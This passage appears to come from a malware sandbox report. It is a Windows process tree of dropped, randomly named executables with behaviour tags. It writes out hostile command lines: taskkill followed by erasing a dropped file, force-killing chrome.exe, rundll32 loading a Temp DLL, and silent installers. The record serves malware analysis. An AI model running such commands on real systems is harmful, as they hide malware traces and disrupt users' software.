C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Y3e6JaaIyxRLqmGjYEFVCESJ.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Y3e6JaaIyxRLqmGjYEFVCESJ.exe" & exit7⤵PID:4284
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Y3e6JaaIyxRLqmGjYEFVCESJ.exe" /f8⤵
- Kills process with taskkill
PID:8092
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Pqps1tk8JPVHwpKpGPqJ3oPg.exe"C:\Users\Admin\Pictures\Adobe Films\Pqps1tk8JPVHwpKpGPqJ3oPg.exe"6⤵PID:5280
-
-
C:\Users\Admin\Pictures\Adobe Films\CtiisNBBoV9um98i0BAIwL4E.exe"C:\Users\Admin\Pictures\Adobe Films\CtiisNBBoV9um98i0BAIwL4E.exe"6⤵PID:5332
-
-
C:\Users\Admin\Pictures\Adobe Films\AO9DXOOm90MDECbaY85w5z58.exe"C:\Users\Admin\Pictures\Adobe Films\AO9DXOOm90MDECbaY85w5z58.exe"6⤵PID:5384
-
C:\Users\Admin\Pictures\Adobe Films\AO9DXOOm90MDECbaY85w5z58.exe"C:\Users\Admin\Pictures\Adobe Films\AO9DXOOm90MDECbaY85w5z58.exe"7⤵PID:7064
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe4⤵PID:700
-
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19b4ef3b53293fe.exeTue19b4ef3b53293fe.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1884 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:6604
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:8068
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 708 -s 6084⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-JUASB.tmp\Tue19879c4c0e.tmp"C:\Users\Admin\AppData\Local\Temp\is-JUASB.tmp\Tue19879c4c0e.tmp" /SL5="$5005C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19879c4c0e.exe" /SILENT1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2956
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4916 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4940
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4388
-
C:\Windows\SysWOW64\autofmt.exe"C:\Windows\SysWOW64\autofmt.exe"1⤵PID:5588
-
C:\Windows\SysWOW64\wlanext.exe"C:\Windows\SysWOW64\wlanext.exe"1⤵PID:5824
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\CtiisNBBoV9um98i0BAIwL4E.exe"2⤵PID:5836
-
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"1⤵PID:6008
-
C:\Windows\SysWOW64\autofmt.exe"C:\Windows\SysWOW64\autofmt.exe"1⤵PID:5440
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe"1⤵PID:4752
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe"1⤵PID:4984
-
C:\Users\Admin\AppData\Local\Temp\is-J8GD8.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-J8GD8.tmp\setup.tmp" /SL5="$30312,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT1⤵PID:1692
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart2⤵PID:5304
-
C:\42def5308084d3940019ab\Setup.exeC:\42def5308084d3940019ab\\Setup.exe /q /norestart /x86 /x64 /web3⤵PID:7544
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss12⤵PID:5256
-
-
C:\Users\Admin\AppData\Local\Temp\is-HT2DG.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-HT2DG.tmp\postback.exe" ss12⤵PID:5248
-